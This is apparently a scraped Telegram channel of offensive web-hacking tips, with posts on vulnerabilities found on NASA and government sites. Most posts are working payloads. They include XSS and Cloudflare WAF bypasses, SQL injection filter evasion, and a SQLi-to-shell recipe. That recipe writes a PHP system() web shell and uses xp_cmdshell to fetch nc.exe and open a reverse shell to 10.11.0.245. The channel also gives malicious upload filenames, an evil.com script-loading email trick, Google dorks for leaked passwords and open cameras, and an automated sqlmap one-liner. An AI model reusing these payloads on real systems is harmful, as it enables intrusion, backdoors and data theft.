ExploitQuest
6.84K subscribers
37 photos
9 videos
2 files
41 links
Download Telegram
My first vulnerability in NASA: A Local File Inclusion (LFI) vulnerability has been discovered. A Local File Inclusion (LFI/Directory Traversal) vulnerability has been identified on NASA.GOV. This vulnerability allows attackers to exploit insecure file path injection to access sensitive files. On the NASA system

https://x.com/Mr_Dark55/status/1866978916302278931?t=-QcBL7_6M9Ui7gnLtPlB1A&s=19
๐Ÿ”ฅ11๐Ÿ‘1๐Ÿ‘1
I found Open Redirect on a government website gov
๐Ÿ”ฅ8๐Ÿ˜3๐Ÿ‘1
CVE-2024-10793

WP Activity Log Plugin for WordPress
Stored XSS via user_id parameter in all versions prior to 5.2.1

curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \-d 'action=destroy-sessions&user_id=<script>alert("XSS")</script>'
โค5
๐Ÿ’ป Disclosed vulnerabilities with bug bounty

1๏ธโƒฃ Account takeover via Self-XSS
An example of how additional functionality can be used to squeeze account takeover in one click from the useless Self XSS. See the report for more details.

2๏ธโƒฃ SQL injection in POST request
Identification and exploitation of Union-based SQL injection in POST request based on server responses. More information about exploitation of such vulnerabilities here.

3๏ธโƒฃ OTP Bypass
Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here.

#web #xss #sqli
โค7๐Ÿ‘3๐Ÿ‘2
ExploitQuest
Photo
โ€‹โ€‹๐Ÿ’‰ About bypassing protection against SQL injections

Often, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it.

For example, by adding control characters like %00 , %0A , etc. or by inserting mathematical operations


( 'AND'1'=1*1 instead of 'AND'1'='1' )


or by adding specific comments like

/*!50000%55nIoN*/ /*!50000%53eLeCt*/



and much more.

For more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site.


https://websec.ca/kb/sql_injection

https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/

#web #sqli #bypass #waf
โค6๐Ÿ”ฅ3
You can use httpx to request any path and see the status code and length and other details on the go, filter, or matcher flags if you want to be more specific.

httpx -path /swagger-api/ -status-code -content-length
๐Ÿ”ฅ8๐Ÿ‘2โค1
๐Ÿ—‚ Forgotten database dumps

Old database dumps can contain all sorts of interesting information - user credentials, configuration settings, API secrets and keys, customer data, and more.

Here is a short but effective checklist to quickly check for forgotten database dumps.



/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
/setup.sql
/sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
๐Ÿ‘4โค1
dork:

intitle:"index of" "back.sql" OR "backup.sql" OR "accounts.sql" OR "backups.sql" OR "clients.sql" OR "customers.sql" OR "data.sql" OR "database.sql" OR "database.sqlite" OR "users.sql" OR "db.sql" OR "db.sqlite" OR "db_backup.sql" OR "dbase.sql" OR "dbdump.sql" OR "setup.sql" OR "sqldump.sql" OR "dump.sql" OR "mysql.sql" OR "sql.sql" OR "temp.sql"
๐Ÿ‘4โค1
gov
๐Ÿ”ฅ3๐Ÿ‘1
๐Ÿ’‰ Transition from SQL injection to shell or backdoor

โ–ซ๏ธUse the โ€œinto outfileโ€ command to write to a file:


' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #

โ–ซ๏ธCapture the request in Burp Proxy and save it to the post-request file, then run sqlmap :

sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10

โ–ซ๏ธreverse netcat shell via mssql injection when xp_cmdshell is available:

1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--


#web #sqli
๐Ÿ”ฅ4โค1
๐Ÿ“จ Getting other vulnerabilities when downloading a file

When testing file upload functionality in a web application, try setting the file name to the following values:


โ–ซ๏ธ ../../../tmp/lol.png -> for Path Traversal vulnerability


โ–ซ๏ธ sleep(10)-- -.jpg -> for SQL injection


โ–ซ๏ธ <svg onload=alert(document.domain)>.jpg/png -> for XSS


โ–ซ๏ธ ; sleep 10; -> for command injection


These payloads may introduce additional vulnerabilities.

#web
๐Ÿ‘3๐Ÿ‘3โค1
๐Ÿ”Ž A small selection of interesting Google dorks

โ–ซ๏ธ FTP servers and sites


intitle:โ€œindex ofโ€ inurl:ftp after:2018

โ–ซ๏ธLog files with passwords:
allintext:password filetype:log after:2018

โ–ซ๏ธConfiguration files with passwords:
filetype:env โ€œDB_PASSWORDโ€ after:2018

โ–ซ๏ธLists with email addresses:
filetype:xls inurl:โ€œemail.xlsโ€

โ–ซ๏ธOpen cameras:
inurl:top.htm inurl:currenttime

#web #google
๐Ÿ‘5โค3๐Ÿ”ฅ1
After exploiting sql injection using the following email address

"'-sleep(5)-'"@mail.local

you can't help but wonder: why the hell did this even get through as a valid email?

In general, the local part (login, before @) of an email can contain special characters according to RFC, if it is enclosed in double quotes. And then - already beloved programming languages โ€‹โ€‹deviate a little from what characters can be used.

So, the next magic:


php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);โ€

It will validate and legally return an email with the attack vector:

"'--><script/src=//evil.com></script>"@example.com


And how the developers display it further is a separate question.

#sqli
๐Ÿ”ฅ5๐Ÿ‘1
Memes about xss are like this ๐Ÿคก๐Ÿ˜‚.
๐Ÿ˜10
โ›…๏ธ Bypass Cloudflare WAF

Payloads working at the time of publication for performing XSS on sites protected by Cloudflare WAF.


&lt;img longdesc="src='x'onerror=alert(document.domain);//&gt;&lt;img " src='showme'&gt;


&lt;img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//&amp;quot;" src="x" alt="showme"&gt;

#web #xss
โค4
Hacking with an image. PHP payload in an image.

The php-jpeg-injector tool can be used to attack web applications that run a .jpeg image through the PHP GD graphics library.

The tool creates a new .jpeg file with a PHP payload. The infected .jpeg file is executed via PHP's gd library. PHP interprets the payload injected into the jpeg and executes it.


#web

GitHub Link
โค3๐Ÿ‘3
๐Ÿ’‰ Find SQL injection on the site with one command

As always, a set of commands is used for these purposes.

Findomain collects the domains of the site being tested.

Httpx checks their availability.

Waybackurls retrieves all URLs that the Wayback Machine knows about identified live subdomains.

Anew will merge Findomain and Waybackurls output and remove duplicates.

Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).


Finally, let's run sqlmap on all identified potentially vulnerable URLs.

findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent

#web #sqli
๐Ÿ‘11